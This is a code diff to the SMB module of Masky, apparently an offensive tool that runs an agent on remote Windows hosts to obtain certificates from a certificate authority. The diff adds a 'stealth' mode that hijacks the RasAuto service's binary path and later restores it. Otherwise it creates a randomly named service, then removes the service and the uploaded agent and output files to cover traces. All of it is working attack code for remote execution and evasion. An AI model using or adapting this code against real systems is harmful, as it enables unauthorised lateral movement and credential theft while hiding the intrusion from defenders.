@@ -13,6 +13,7 @@ logger = logging.getLogger("masky")
 class Smb:
     def __init__(
         self,
+        tracker,
         domain,
         username,
         dc_target,
@@ -20,11 +21,15 @@ class Smb:
         hashes=None,
         kerberos=None,
         aeskey=None,
+        stealth=False,
     ):
+        self.__tracker = tracker
         self.__domain = domain
         self.__username = username
         self.__password = password
         self.__lmhash, self.__nthash = "", ""
+        self.__stealth = stealth
+
         if hashes:
             self.__lmhash, self.__nthash = hashes.split(":")
         self.__dc_target = dc_target
@@ -34,7 +39,6 @@ class Smb:
         self.__rpc_con = None
         self.__scmr_con = None
         self.__svc_handle = None
-        self.__svc_name = "RasAuto"
         self.__service = None
 
         self.__initial_binary_path = None
@@ -65,6 +69,9 @@ class Smb:
         logger.debug(
             f"The Masky agent errors will be stored in: {self.__errors_remote_path}"
         )
+        self.__tracker.agent_filename = self.__agent_filename
+        self.__tracker.output_filename = self.__output_filename
+        self.__tracker.error_filename = self.__error_filename
 
     def exec_masky(self, target, ca, template):
         try:
@@ -73,24 +80,36 @@ class Smb:
                 f"Masky agent was successfuly uploaded in: '{self.__masky_remote_path}'"
             )
         except Exception as e:
+            err_msg = None
             if "STATUS_ACCESS_DENIED" in str(e):
-                logger.warn(
-                    f"The user {self.__domain}\{self.__username} is not local administrator on this system"
-                )
+                err_msg = f"The user {self.__domain}\{self.__username} is not local administrator on this system"
+                logger.warn(err_msg)
             elif "STATUS_LOGON_FAILURE" in str(e):
-                logger.error(
-                    f"The provided credentials for the user '{self.__domain}\{self.__username}' are invalids or the user does not exist"
-                )
+                err_msg = f"The provided credentials for the user '{self.__domain}\{self.__username}' are invalids or the user does not exist"
+                logger.error(err_msg)
             else:
-                logger.error(f"Fail to upload the agent ({str(e)})")
+                err_msg = f"Fail to upload the agent ({str(e)})"
+                logger.error(err_msg)
+            self.__tracker.last_error_msg = err_msg
             raise Exception
         try:
+            self.__command = f'{self.__masky_remote_path} /ca:"{ca}" /template:"{template}" /output:"{self.__results_remote_path}" /debug:"{self.__errors_remote_path}"'
             self.__init_rpc(target)
             self.__init_scmr()
-            self.__edit_svc(ca, template)
-            logger.debug(f"The service '{self.__svc_name}' was successfuly modified")
+            if self.__stealth:
+                self.__edit_svc()
+                logger.debug(
+                    f"The service '{self.__svc_name}' was successfuly modified"
+                )
+            else:
+                self.__create_svc()
+                logger.debug(f"The service '{self.__svc_name}' was successfuly created")
         except Exception as e:
-            logger.error(f"Fail to edit the '{self.__svc_name}' service via DCERPC")
+            err_msg = (
+                f"Fail to edit or create the '{self.__svc_name}' service via DCERPC"
+            )
+            logger.error(err_msg)
+            self.__tracker.last_error_msg = err_msg
             self.__clean(target)
             raise Exception
         try:
@@ -103,7 +122,9 @@ class Smb:
         try:
             rslt = self.__process_results(target)
         except Exception as e:
-            logger.error(f"The Masky agent execution probably failed ({str(e)})")
+            err_msg = f"The Masky agent execution probably failed ({str(e)})"
+            logger.error(err_msg)
+            self.__tracker.last_error_msg = err_msg
         self.__clean(target)
         return rslt
 
@@ -157,13 +178,14 @@ class Smb:
         try:
             smbclient.deleteFile(self.__share, self.__masky_remote_path)
         except:
+            self.__tracker.files_cleaning_success = False
             logger.warn(
                 f"Fail to remove Masky agent located in: {self.__masky_remote_path}"
             )
         smbclient.close()
 
     def __process_results(self, target_host):
-        rslt = MaskyResults()
+        rslt = MaskyResults(self.__tracker)
         smbclient = SMBConnection(target_host, target_host, sess_port=self.__port)
         if self.__kerberos:
             smbclient.kerberosLogin(
@@ -196,6 +218,7 @@ class Smb:
         try:
             smbclient.deleteFile(self.__share, self.__results_remote_path)
         except:
+            self.__tracker.files_cleaning_success = False
             logger.warn(
                 f"Fail to remove Masky agent output file located in: {self.__results_remote_path}"
             )
@@ -207,14 +230,14 @@ class Smb:
                 rslt.parse_agent_errors,
             )
             if rslt.errors:
-                logger.error(
-                    f"The Masky agent execution failed, enable the debugging to display the stacktrace"
-                )
+                err_msg = f"The Masky agent execution failed, enable the debugging to display the stacktrace"
+                logger.error(err_msg)
         except:
             logger.warn("No Masky agent error file was downloaded")
         try:
             smbclient.deleteFile(self.__share, self.__errors_remote_path)
         except:
+            self.__tracker.files_cleaning_success = False
             logger.warn(
                 f"Fail to remove Masky agent error file located in: {self.__errors_remote_path}"
             )
@@ -254,10 +277,12 @@ class Smb:
         self.__scmr_con.bind(scmr.MSRPC_UUID_SCMR)
         resp = scmr.hROpenSCManagerW(self.__scmr_con)
         self.__svc_handle = resp["lpScHandle"]
+
+    def __edit_svc(self):
+        self.__svc_name = "RasAuto"
+        self.__tracker.svc_name = self.__svc_name
         resp = scmr.hROpenServiceW(self.__scmr_con, self.__svc_handle, self.__svc_name)
         self.__service = resp["lpServiceHandle"]
-
-    def __edit_svc(self, ca, template):
         resp = scmr.hRQueryServiceConfigW(self.__scmr_con, self.__service)
         self.__initial_binary_path = resp["lpServiceConfig"]["lpBinaryPathName"]
         self.__initial_start_type = resp["lpServiceConfig"]["dwStartType"]
@@ -271,7 +296,7 @@ class Smb:
             scmr.SERVICE_NO_CHANGE,
             scmr.SERVICE_DEMAND_START,
             scmr.SERVICE_ERROR_IGNORE,
-            f'{self.__masky_remote_path} /ca:"{ca}" /template:"{template}" /output:"{self.__results_remote_path}" /debug:"{self.__errors_remote_path}"',
+            self.__command,
             NULL,
             NULL,
             NULL,
@@ -282,6 +307,19 @@ class Smb:
             NULL,
         )
 
+    def __create_svc(self):
+        self.__svc_name = "".join(random.choices(string.ascii_lowercase, k=8))
+        self.__tracker.svc_name = self.__svc_name
+        resp = scmr.hRCreateServiceW(
+            self.__scmr_con,
+            self.__svc_handle,
+            self.__svc_name,
+            self.__svc_name,
+            lpBinaryPathName=self.__command,
+            dwStartType=scmr.SERVICE_DEMAND_START,
+        )
+        self.__service = resp["lpServiceHandle"]
+
     def __revert_svc(self):
         try:
             scmr.hRChangeServiceConfigW(
@@ -304,23 +342,42 @@ class Smb:
                 f"The '{self.__svc_name}' service binary path has been restored"
             )
         except Exception as e:
+            self.__tracker.svc_cleaning_success = False
             logger.warn(
                 f"Fail to revert '{self.__svc_name}' service binary path ({str(e)}])"
             )
 
+    def __remove_svc(self):
+        try:
+            scmr.hRDeleteService(self.__scmr_con, self.__service)
+            scmr.hRCloseServiceHandle(self.__scmr_con, self.__service)
+            logger.debug(
+                f"The '{self.__svc_name}' service binary path has been removed"
+            )
+        except Exception as e:
+            self.__tracker.svc_cleaning_success = False
+            logger.warn(f"Fail to remove '{self.__svc_name}' service ({str(e)}])")
+
     def __clean(self, target_host):
         try:
-            self.__revert_svc()
+            if self.__stealth:
+                self.__revert_svc()
+            else:
+                self.__remove_svc()
         except:
             logger.warning(
-                f"An error occurred while trying to restore service {self.__svc_name}. Trying again..."
+                f"An error occurred while trying to restore or remove the service '{self.__svc_name}'. Trying again..."
             )
             try:
                 self.__init_scmr()
-                self.__revert_svc()
+                if self.__stealth:
+                    self.__revert_svc()
+                else:
+                    self.__remove_svc()
             except Exception as e:
+                self.__tracker.svc_cleaning_success = False
                 logger.warning(
-                    f"An unknown error occured while trying to revert '{self.__svc__name}' ({str(e)})"
+                    f"An unknown error occured while trying to revert or remove '{self.__svc_name}' ({str(e)})"
                 )
         try:
             scmr.hRControlService(
@@ -332,4 +389,5 @@ class Smb:
         try:
             self.__remove_masky(target_host)
         except Exception as e:
+            self.__tracker.files_cleaning_success = False
             logger.warn(f"Fail to remove Masky related files on the target ({str(e)}")
